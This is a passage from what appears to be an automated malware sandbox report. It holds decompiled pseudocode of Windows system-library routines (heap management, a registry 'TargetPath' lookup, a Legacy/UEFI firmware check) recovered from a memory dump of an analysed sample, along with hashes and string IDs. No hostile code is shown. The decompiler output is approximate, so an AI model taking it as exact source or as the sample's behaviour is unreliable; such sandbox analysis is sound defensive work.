                                                        							_push("HEAP: ");
                                                        							E017EB150();
                                                        						} else {
                                                        							E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        						}
                                                        						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
                                                        						E017EB150();
                                                        						__eflags =  *0x18d7bc8;
                                                        						if(__eflags == 0) {
                                                        							E018A2073(_t27, 1, _t39, __eflags);
                                                        						}
                                                        					}
                                                        				}
                                                        				_t38 =  *(_t39 + 0xb8);
                                                        				if(_t38 != 0) {
                                                        					_t13 = _t40 >> 0xc;
                                                        					__eflags = _t13;
                                                        					while(1) {
                                                        						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
                                                        						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
                                                        							break;
                                                        						}
                                                        						_t30 =  *_t38;
                                                        						__eflags = _t30;
                                                        						if(_t30 != 0) {
                                                        							_t38 = _t30;
                                                        							continue;
                                                        						}
                                                        						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
                                                        						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
                                                        						break;
                                                        					}
                                                        					return E0180AB40(_t39, _t38, 0, _t13, _t40);
                                                        				} else {
                                                        					_t31 = _t39 + 0x8c;
                                                        					_t16 =  *_t31;
                                                        					while(_t31 != _t16) {
                                                        						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
                                                        						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
                                                        							return _t16;
                                                        						}
                                                        						_t16 =  *_t16;
                                                        					}
                                                        					return _t31;
                                                        				}
                                                        			}

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                        • API String ID: 0-2558761708
                                                        • Opcode ID: 80e3f99969b71dbd950b07d4b9100d4ffacf313df9073783129214ea460c35e5
                                                        • Instruction ID: 1951b20953e04ffd9643453a6dfb708b24ddbe76035a49dcc84ba7d3013b0e1e
                                                        • Opcode Fuzzy Hash: 80e3f99969b71dbd950b07d4b9100d4ffacf313df9073783129214ea460c35e5
                                                        • Instruction Fuzzy Hash: 9311D33531560A9FD7AAD71DC894B35F7A6EB40B24F14852DE40ACB395EA30DB40C741
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 60%
                                                        			E018AE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                                        				signed int _v20;
                                                        				char _v24;
                                                        				signed int _v40;
                                                        				char _v44;
                                                        				intOrPtr _v48;
                                                        				signed int _v52;
                                                        				unsigned int _v56;
                                                        				char _v60;
                                                        				signed int _v64;
                                                        				char _v68;
                                                        				signed int _v72;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				char _t87;
                                                        				signed int _t90;
                                                        				signed int _t94;
                                                        				signed int _t100;
                                                        				intOrPtr* _t113;
                                                        				signed int _t122;
                                                        				void* _t132;
                                                        				void* _t135;
                                                        				signed int _t139;
                                                        				signed int* _t141;
                                                        				signed int _t146;
                                                        				signed int _t147;
                                                        				void* _t153;
                                                        				signed int _t155;
                                                        				signed int _t159;
                                                        				char _t166;
                                                        				void* _t172;
                                                        				void* _t176;
                                                        				signed int _t177;
                                                        				intOrPtr* _t179;
                                                        
                                                        				_t179 = __ecx;
                                                        				_v48 = __edx;
                                                        				_v68 = 0;
                                                        				_v72 = 0;
                                                        				_push(__ecx[1]);
                                                        				_push( *__ecx);
                                                        				_push(0);
                                                        				_t153 = 0x14;
                                                        				_t135 = _t153;
                                                        				_t132 = E018ABBBB(_t135, _t153);
                                                        				if(_t132 == 0) {
                                                        					_t166 = _v68;
                                                        					goto L43;
                                                        				} else {
                                                        					_t155 = 0;
                                                        					_v52 = 0;
                                                        					asm("stosd");
                                                        					asm("stosd");
                                                        					asm("stosd");
                                                        					asm("stosd");
                                                        					asm("stosd");
                                                        					_v56 = __ecx[1];
                                                        					if( *__ecx >> 8 < 2) {
                                                        						_t155 = 1;
                                                        						_v52 = 1;
                                                        					}
                                                        					_t139 = _a4;
                                                        					_t87 = (_t155 << 0xc) + _t139;
                                                        					_v60 = _t87;
                                                        					if(_t87 < _t139) {
                                                        						L11:
                                                        						_t166 = _v68;
                                                        						L12:
                                                        						if(_t132 != 0) {
                                                        							E018ABCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                                        						}
                                                        						L43:
                                                        						if(_v72 != 0) {
                                                        							_push( *((intOrPtr*)(_t179 + 4)));
                                                        							_push( *_t179);
                                                        							_push(0x8000);
                                                        							E018AAFDE( &_v72,  &_v60);
                                                        						}
                                                        						L46:
                                                        						return _t166;
                                                        					}
                                                        					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                                        					asm("sbb edi, edi");
                                                        					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                                        					if(_t90 != 0) {
                                                        						_push(0);
                                                        						_push(0x14);
                                                        						_push( &_v44);
                                                        						_push(3);
                                                        						_push(_t179);
                                                        						_push(0xffffffff);
                                                        						if(E01829730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                                        							_push(_t139);
                                                        							E018AA80D(_t179, 1, _v40, 0);
                                                        							_t172 = 4;
                                                        						}
                                                        					}
                                                        					_t141 =  &_v72;
                                                        					if(E018AA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                                        						_v64 = _a4;
                                                        						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                                        						asm("sbb edi, edi");
                                                        						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                                        						if(_t94 != 0) {
                                                        							_push(0);
                                                        							_push(0x14);
                                                        							_push( &_v24);
                                                        							_push(3);
                                                        							_push(_t179);
                                                        							_push(0xffffffff);
                                                        							if(E01829730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                                        								_push(_t141);
                                                        								E018AA80D(_t179, 1, _v20, 0);
                                                        								_t176 = 4;
                                                        							}
                                                        						}
                                                        						if(E018AA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                                        							goto L11;
                                                        						} else {
                                                        							_t177 = _v64;
                                                        							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                                        							_t100 = _v52 + _v52;
                                                        							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                                        							 *(_t132 + 0x10) = _t146;
                                                        							asm("bsf eax, [esp+0x18]");
                                                        							_v52 = _t100;
                                                        							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                                        							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                                        							_t47 =  &_a8;
                                                        							 *_t47 = _a8 & 0x00000001;
                                                        							if( *_t47 == 0) {
                                                        								E01802280(_t179 + 0x30, _t179 + 0x30);
                                                        							}
                                                        							_t147 =  *(_t179 + 0x34);
                                                        							_t159 =  *(_t179 + 0x38) & 1;
                                                        							_v68 = 0;
                                                        							if(_t147 == 0) {
                                                        								L35:
                                                        								E017FB090(_t179 + 0x34, _t147, _v68, _t132);
                                                        								if(_a8 == 0) {
                                                        									E017FFFB0(_t132, _t177, _t179 + 0x30);
                                                        								}
                                                        								asm("lock xadd [eax], ecx");
                                                        								asm("lock xadd [eax], edx");
                                                        								_t132 = 0;
                                                        								_v72 = _v72 & 0;
                                                        								_v68 = _v72;
                                                        								if(E01807D50() == 0) {
                                                        									_t113 = 0x7ffe0388;
                                                        								} else {
                                                        									_t177 = _v64;
                                                        									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                        								}
                                                        								if( *_t113 == _t132) {
                                                        									_t166 = _v68;
                                                        									goto L46;
                                                        								} else {
                                                        									_t166 = _v68;
                                                        									E0189FEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                                        									goto L12;
                                                        								}
                                                        							} else {
                                                        								L23:
                                                        								while(1) {
                                                        									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                                        										_t122 =  *_t147;
                                                        										if(_t159 == 0) {
                                                        											L32:
                                                        											if(_t122 == 0) {
                                                        												L34:
                                                        												_v68 = 0;
                                                        												goto L35;
                                                        											}
                                                        											L33:
                                                        											_t147 = _t122;
                                                        											continue;
                                                        										}
                                                        										if(_t122 == 0) {
                                                        											goto L34;
                                                        										}
                                                        										_t122 = _t122 ^ _t147;
                                                        										goto L32;
                                                        									}
                                                        									_t122 =  *(_t147 + 4);
                                                        									if(_t159 == 0) {
                                                        										L27:
                                                        										if(_t122 != 0) {
                                                        											goto L33;
                                                        										}
                                                        										L28:
                                                        										_v68 = 1;
                                                        										goto L35;
                                                        									}
                                                        									if(_t122 == 0) {
                                                        										goto L28;
                                                        									}
                                                        									_t122 = _t122 ^ _t147;
                                                        									goto L27;
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					_v72 = _v72 & 0x00000000;
                                                        					goto L11;
                                                        				}
                                                        			}





































                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: `$`
                                                        • API String ID: 0-197956300
                                                        • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                        • Instruction ID: b6b294e8ea49f80278a0cc5cffc8a6a2b0b0596c64c9e09e8efe6b2969a9938e
                                                        • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                        • Instruction Fuzzy Hash: F2919F316043469FF724CE29C841B1BBBE5AF84714F548D2DFA99CB280E774EA04CB52
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 87%
                                                        			E017E6F60(intOrPtr _a4, char* _a8, intOrPtr* _a12, signed int _a16, intOrPtr _a20, unsigned int _a24, unsigned int* _a28) {
                                                        				intOrPtr _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr _v16;
                                                        				intOrPtr _v20;
                                                        				intOrPtr _v24;
                                                        				void* _v28;
                                                        				intOrPtr _v32;
                                                        				char _v36;
                                                        				char _v44;
                                                        				short _v48;
                                                        				char _v52;
                                                        				unsigned int _v56;
                                                        				intOrPtr _v60;
                                                        				void* _v68;
                                                        				signed int _t72;
                                                        				signed int _t81;
                                                        				unsigned int* _t98;
                                                        				intOrPtr _t102;
                                                        				intOrPtr _t108;
                                                        				void* _t109;
                                                        				unsigned int* _t110;
                                                        				short _t113;
                                                        				unsigned int _t115;
                                                        				unsigned int _t117;
                                                        				void* _t119;
                                                        				unsigned int _t120;
                                                        				intOrPtr* _t121;
                                                        				intOrPtr* _t124;
                                                        				intOrPtr* _t126;
                                                        				unsigned int _t129;
                                                        				intOrPtr* _t130;
                                                        				intOrPtr* _t131;
                                                        				short _t134;
                                                        				signed int _t137;
                                                        				void* _t139;
                                                        				void* _t140;
                                                        				signed int _t141;
                                                        				signed int _t142;
                                                        				void* _t144;
                                                        
                                                        				_t144 = (_t142 & 0xfffffff8) - 0x34;
                                                        				_t72 = _a16;
                                                        				_t113 = 0;
                                                        				_v44 = 0;
                                                        				_v52 = 0;
                                                        				_v48 = 0;
                                                        				_t134 = 0;
                                                        				if(_t72 != 0) {
                                                        					if(_t72 == 1) {
                                                        						goto L1;
                                                        					}
                                                        					_t81 = 0xc00000f1;
                                                        					L14:
                                                        					return _t81;
                                                        				}
                                                        				L1:
                                                        				_v28 = 0x18;
                                                        				_v20 = 0x17c16a8 + _t72 * 8;
                                                        				_push( &_v28);
                                                        				_push(0x20019);
                                                        				_v24 = _t113;
                                                        				_push( &_v52);
                                                        				_v16 = 0x40;
                                                        				_v12 = _t113;
                                                        				_v8 = _t113;
                                                        				_t137 = E01829600();
                                                        				if(_t137 != 0xc0000034) {
                                                        					if(_t137 < 0) {
                                                        						L10:
                                                        						if(_v52 != 0) {
                                                        							_push(_v52);
                                                        							E018295D0();
                                                        						}
                                                        						if(_v48 != 0) {
                                                        							_push(_v48);
                                                        							E018295D0();
                                                        						}
                                                        						if(_t134 != 0) {
                                                        							L018077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t113, _t134);
                                                        						}
                                                        						_t81 = _t137;
                                                        						goto L14;
                                                        					}
                                                        					E0182BB40(_t119,  &_v36, _a4);
                                                        					_v32 = _v60;
                                                        					_v28 =  &_v44;
                                                        					_push( &_v36);
                                                        					_push(0x20019);
                                                        					_v36 = 0x18;
                                                        					_push( &_v56);
                                                        					_v24 = 0x40;
                                                        					_v20 = _t113;
                                                        					_v16 = _t113;
                                                        					_t137 = E01829600();
                                                        					if(_t137 == 0xc0000034) {
                                                        						goto L2;
                                                        					}
                                                        					L20:
                                                        					if(_t137 < 0) {
                                                        						goto L10;
                                                        					}
                                                        					_t89 = _a8;
                                                        					if(_a8 == 0) {
                                                        						_t89 = L"TargetPath";
                                                        					}
                                                        					E0182BB40(_t119,  &_v36, _t89);
                                                        					_t115 = _a24;
                                                        					_t139 = _t115 + 0x10;
                                                        					if(_t139 >= _t115) {
                                                        						_t134 = E01804620(_t119,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t139);
                                                        						if(_t134 != 0) {
                                                        							_push( &_v56);
                                                        							_push(_t139);
                                                        							_push(_t134);
                                                        							_push(2);
                                                        							_push( &_v36);
                                                        							_push(_v48);
                                                        							_t137 = E01829650();
                                                        							if(_t137 < 0) {
                                                        								if(_t137 != 0x80000005) {
                                                        									goto L51;
                                                        								}
                                                        								L32:
                                                        								_t120 =  *(_t134 + 8);
                                                        								_t49 = _t134 + 0xc; // 0xc
                                                        								_t131 = _t49;
                                                        								_v56 = _t120;
                                                        								if(_t137 < 0) {
                                                        									L47:
                                                        									_t98 = _a28;
                                                        									if(_t98 != 0) {
                                                        										 *_t98 = _t120;
                                                        									}
                                                        									if(_t137 >= 0) {
                                                        										E0182F3E0(_a20, _t131, _t120);
                                                        									}
                                                        									goto L51;
                                                        								}
                                                        								_t117 = _a24;
                                                        								if( *((intOrPtr*)(_t131 + (_t120 >> 1) * 2 - 2)) != 0) {
                                                        									_t120 = _t120 + 2;
                                                        									_v56 = _t120;
                                                        									if(_t117 < _t120) {
                                                        										_t137 = 0x80000005;
                                                        									} else {
                                                        										 *((short*)(_t131 + (_t120 >> 1) * 2 - 2)) = 0;
                                                        										_t120 = _v56;
                                                        									}
                                                        								}
                                                        								if(_t137 < 0 ||  *((intOrPtr*)(_t134 + 4)) != 2) {
                                                        									goto L47;
                                                        								} else {
                                                        									_t121 = _t131;
                                                        									_t61 = _t121 + 2; // 0xe
                                                        									_t140 = _t61;
                                                        									do {
                                                        										_t102 =  *_t121;
                                                        										_t121 = _t121 + 2;
                                                        									} while (_t102 != _v44);
                                                        									_t113 = 0;
                                                        									_t137 = E01812440(0, _t131, _t121 - _t140 >> 1, _a20, _t117 >> 1, _t144 + 0x1c);
                                                        									if(_t137 >= 0 || _t137 == 0xc0000023) {
                                                        										_t124 = _a28;
                                                        										if(_t124 != 0) {
                                                        											 *_t124 =  *((intOrPtr*)(_t144 + 0x1c)) +  *((intOrPtr*)(_t144 + 0x1c));
                                                        										}
                                                        										if(_t137 == 0xc0000023) {
                                                        											_t137 = 0x80000005;
                                                        										}
                                                        									}
                                                        									goto L10;
                                                        								}
                                                        							}
                                                        							if( *((intOrPtr*)(_t134 + 4)) == 1 ||  *((intOrPtr*)(_t134 + 4)) == 2) {
                                                        								goto L32;
                                                        							} else {
                                                        								_t137 = 0xc0000024;
                                                        								goto L51;
                                                        							}
                                                        						}
                                                        						_t137 = 0xc0000017;
                                                        						goto L51;
                                                        					} else {
                                                        						_t137 = 0xc0000095;
                                                        						L51:
                                                        						_t113 = 0;
                                                        						goto L10;
                                                        					}
                                                        				}
                                                        				L2:
                                                        				_t130 = _a12;
                                                        				if(_t130 == 0) {
                                                        					goto L20;
                                                        				} else {
                                                        					_t126 = _t130;
                                                        					_t141 = _t126 + 2;
                                                        					goto L4;
                                                        					L4:
                                                        					_t108 =  *_t126;
                                                        					_t126 = _t126 + 2;
                                                        					if(_t108 != _t113) {
                                                        						goto L4;
                                                        					} else {
                                                        						_t109 = (_t126 - _t141 >> 1) + 1;
                                                        						_t129 = _t109 + _t109;
                                                        						_v56 = _t129;
                                                        						if(_t129 < _t109) {
                                                        							_t137 = 0xc0000095;
                                                        						} else {
                                                        							_t110 = _a28;
                                                        							asm("sbb esi, esi");
                                                        							_t137 = _t141 & 0x80000005;
                                                        							if(_t110 != 0) {
                                                        								 *_t110 = _t129;
                                                        							}
                                                        							if(_t129 <= _a24) {
                                                        								E0182F3E0(_a20, _t130, _t129);
                                                        							}
                                                        						}
                                                        						goto L10;
                                                        					}
                                                        				}
                                                        			}











































                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$TargetPath
                                                        • API String ID: 0-4164548946
                                                        • Opcode ID: 406827210a6c0f704543ca89b4f4b38c39ec81f593e23c41cb84723c68a7f56e
                                                        • Instruction ID: 85d70a317ffe6ffa22473480fe23ac42dea3cb121c9fcfdc30867f1eb0eee651
                                                        • Opcode Fuzzy Hash: 406827210a6c0f704543ca89b4f4b38c39ec81f593e23c41cb84723c68a7f56e
                                                        • Instruction Fuzzy Hash: B481EF7290832A9FD725CE18D884A6BFBE5BB88314F01456DFA45D7201EB30EE45CB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 77%
                                                        			E018651BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                        				signed short* _t63;
                                                        				signed int _t64;
                                                        				signed int _t65;
                                                        				signed int _t67;
                                                        				intOrPtr _t74;
                                                        				intOrPtr _t84;
                                                        				intOrPtr _t88;
                                                        				intOrPtr _t94;
                                                        				void* _t100;
                                                        				void* _t103;
                                                        				intOrPtr _t105;
                                                        				signed int _t106;
                                                        				short* _t108;
                                                        				signed int _t110;
                                                        				signed int _t113;
                                                        				signed int* _t115;
                                                        				signed short* _t117;
                                                        				void* _t118;
                                                        				void* _t119;
                                                        
                                                        				_push(0x80);
                                                        				_push(0x18c05f0);
                                                        				E0183D0E8(__ebx, __edi, __esi);
                                                        				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                                        				_t115 =  *(_t118 + 0xc);
                                                        				 *(_t118 - 0x7c) = _t115;
                                                        				 *((char*)(_t118 - 0x65)) = 0;
                                                        				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                        				_t113 = 0;
                                                        				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                                        				 *((intOrPtr*)(_t118 - 4)) = 0;
                                                        				_t100 = __ecx;
                                                        				if(_t100 == 0) {
                                                        					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                        					E017FEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                        					 *((char*)(_t118 - 0x65)) = 1;
                                                        					_t63 =  *(_t118 - 0x90);
                                                        					_t101 = _t63[2];
                                                        					_t64 =  *_t63 & 0x0000ffff;
                                                        					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                        					L20:
                                                        					_t65 = _t64 >> 1;
                                                        					L21:
                                                        					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                                        					if(_t108 == 0) {
                                                        						L27:
                                                        						 *_t115 = _t65 + 1;
                                                        						_t67 = 0xc0000023;
                                                        						L28:
                                                        						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                                        						L29:
                                                        						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                                        						E018653CA(0);
                                                        						return E0183D130(0, _t113, _t115);
                                                        					}
                                                        					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                                        						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                                        							 *_t108 = 0;
                                                        						}
                                                        						goto L27;
                                                        					}
                                                        					 *_t115 = _t65;
                                                        					_t115 = _t65 + _t65;
                                                        					E0182F3E0(_t108, _t101, _t115);
                                                        					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                                        					_t67 = 0;
                                                        					goto L28;
                                                        				}
                                                        				_t103 = _t100 - 1;
                                                        				if(_t103 == 0) {
                                                        					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                                        					_t74 = E01803690(1, _t117, 0x17c1810, _t118 - 0x74);
                                                        					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                                        					_t101 = _t117[2];
                                                        					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                        					if(_t74 < 0) {
                                                        						_t64 =  *_t117 & 0x0000ffff;
                                                        						_t115 =  *(_t118 - 0x7c);
                                                        						goto L20;
                                                        					}
                                                        					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                                        					_t115 =  *(_t118 - 0x7c);
                                                        					goto L21;
                                                        				}
                                                        				if(_t103 == 1) {
                                                        					_t105 = 4;
                                                        					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                                        					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                                        					_push(_t118 - 0x70);
                                                        					_push(0);
                                                        					_push(0);
                                                        					_push(_t105);
                                                        					_push(_t118 - 0x78);
                                                        					_push(0x6b);
                                                        					 *((intOrPtr*)(_t118 - 0x64)) = E0182AA90();
                                                        					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                        					_t113 = E01804620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                                        					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                                        					if(_t113 != 0) {
                                                        						_push(_t118 - 0x70);
                                                        						_push( *((intOrPtr*)(_t118 - 0x70)));
                                                        						_push(_t113);
                                                        						_push(4);
                                                        						_push(_t118 - 0x78);
                                                        						_push(0x6b);
                                                        						_t84 = E0182AA90();
                                                        						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                                        						if(_t84 < 0) {
                                                        							goto L29;
                                                        						}
                                                        						_t110 = 0;
                                                        						_t106 = 0;
                                                        						while(1) {
                                                        							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                                        							 *(_t118 - 0x88) = _t106;
                                                        							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                                        								break;
                                                        							}
                                                        							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                                        							_t106 = _t106 + 1;
                                                        						}
                                                        						_t88 = E0186500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                                        						_t119 = _t119 + 0x1c;
                                                        						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                                        						if(_t88 < 0) {
                                                        							goto L29;
                                                        						}
                                                        						_t101 = _t118 - 0x3c;
                                                        						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                                        						goto L21;
                                                        					}
                                                        					_t67 = 0xc0000017;
                                                        					goto L28;
                                                        				}
                                                        				_push(0);
                                                        				_push(0x20);
                                                        				_push(_t118 - 0x60);
                                                        				_push(0x5a);
                                                        				_t94 = E01829860();
                                                        				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                                        				if(_t94 < 0) {
                                                        					goto L29;
                                                        				}
                                                        				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                                        					_t101 = L"Legacy";
                                                        					_push(6);
                                                        				} else {
                                                        					_t101 = L"UEFI";
                                                        					_push(4);
                                                        				}
                                                        				_pop(_t65);
                                                        				goto L21;
                                                        			}

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: Legacy$UEFI
                                                        • API String ID: 2994545307-634100481
                                                        • Opcode ID: c3b029df467f6177528e7dd8150de89685af67a5cc621bad81c5034b8bacc372
                                                        • Instruction ID: 0e198f08256704cd14bb016f81c92da5e9eabeed8ea05fbfc8fec3bb2530dd4f
                                                        • Opcode Fuzzy Hash: c3b029df467f6177528e7dd8150de89685af67a5cc621bad81c5034b8bacc372
                                                        • Instruction Fuzzy Hash: 9A518CB1E006099FDB25DFA8C980AAEBBF8FF48B44F14402DE659EB251D670DA40CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 68%
                                                        			E017E4439(intOrPtr* __ecx, signed int __edx) {
                                                        				signed int _v8;
                                                        				signed int _v60;
                                                        				intOrPtr _v64;
                                                        				intOrPtr _v68;
                                                        				signed int _v72;
                                                        				intOrPtr _v76;
                                                        				signed int _v84;
                                                        				signed int _v88;
                                                        				char _v92;
                                                        				signed int _v96;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				void* __ebp;
                                                        				signed int _t64;
                                                        				signed int _t68;
                                                        				intOrPtr* _t72;
                                                        				signed int _t74;
                                                        				void* _t77;
                                                        				signed int _t83;
                                                        				signed int _t84;
                                                        
                                                        				_t79 = __edx;
                                                        				_t54 =  *0x18dd360 ^ _t84;
                                                        				_v8 =  *0x18dd360 ^ _t84;
                                                        				_t82 = __ecx;
                                                        				_v96 = __edx;
                                                        				_t74 = __edx;
                                                        				if(__edx != 0 && ( *(__edx + 8) & 0x00000004) == 0) {
                                                        					_t82 = __ecx + 4;
                                                        					_t72 =  *_t82;
                                                        					while(_t72 != _t82) {
                                                        						_t83 = _t72 - 8;
                                                        						_t79 = 1;
                                                        						if( *_t83 != 0x74736c46) {
                                                        							_v84 = _v84 & 0x00000000;
                                                        							_push( &_v92);
                                                        							_v76 = 4;
                                                        							_v72 = 1;
                                                        							_v68 = 1;
                                                        							_v64 = _t82;
                                                        							_v60 = _t83;
                                                        							_v92 = 0xc0150015;
                                                        							_v88 = 1;
                                                        							L0183DEF0(_t74, 1);
                                                        							_t74 = _v96;
                                                        							_t79 = 1;
                                                        						}
                                                        						if( *(_t83 + 0x14) !=  !( *(_t83 + 4))) {
                                                        							_v84 = _v84 & 0x00000000;
                                                        							_push( &_v92);
                                                        							_v76 = 4;
                                                        							_v72 = _t79;
                                                        							_v68 = 2;
                                                        							_v64 = _t82;
                                                        							_v60 = _t83;
                                                        							_v92 = 0xc0150015;
                                                        							_v88 = _t79;
                                                        							L0183DEF0(_t74, _t79);
                                                        							_t74 = _v96;
                                                        						}
                                                        						_t9 = _t83 + 0x18; // 0x1c
                                                        						_t54 = _t9;
                                                        						if(_t74 < _t9) {
                                                        							L13:
                                                        							_t72 =  *_t72;
                                                        							continue;
                                                        						} else {
                                                        							_t10 = _t83 + 0x618; // 0x61c
                                                        							_t54 = _t10;
                                                        							if(_t74 >= _t10) {
                                                        								goto L13;
                                                        							} else {
                                                        								_v96 = 0x30;
                                                        								_t64 = _t74 - _t83 - 0x18;
                                                        								asm("cdq");
                                                        								_t79 = _t64 % _v96;
                                                        								_t54 = 0x18 + _t64 / _v96 * 0x30 + _t83;
                                                        								if(_t74 == 0x18 + _t64 / _v96 * 0x30 + _t83) {
                                                        									_t54 =  *(_t83 + 4);
                                                        									if(_t54 != 0) {
                                                        										_t68 = _t54 - 1;
                                                        										 *(_t83 + 4) = _t68;
                                                        										_t54 =  !_t68;
                                                        										 *(_t83 + 0x14) =  !_t68;
                                                        										 *((intOrPtr*)(_t74 + 8)) = 4;
                                                        										if( *(_t83 + 4) == 0) {
                                                        											_t54 =  *(_t72 + 4);
                                                        											if(_t54 != _t82) {
                                                        												do {
                                                        													_t83 =  *(_t54 + 4);
                                                        													_t79 = _t54 - 8;
                                                        													if( *((intOrPtr*)(_t54 - 8 + 4)) == 0) {
                                                        														_t77 =  *_t54;
                                                        														if( *(_t77 + 4) != _t54 ||  *_t83 != _t54) {
                                                        															_push(3);
                                                        															asm("int 0x29");
                                                        															return 0x3e5;
                                                        														}
                                                        														 *_t83 = _t77;
                                                        														 *(_t77 + 4) = _t83;
                                                        														L018077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t79);
                                                        													}
                                                        													_t54 = _t83;
                                                        												} while (_t83 != _t82);
                                                        											}
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						goto L12;
                                                        					}
                                                        				}
                                                        				L12:
                                                        				return E0182B640(_t54, _t72, _v8 ^ _t84, _t79, _t82, _t83);
                                                        			}

                                                        Strings
                                                        Memory Dump Source
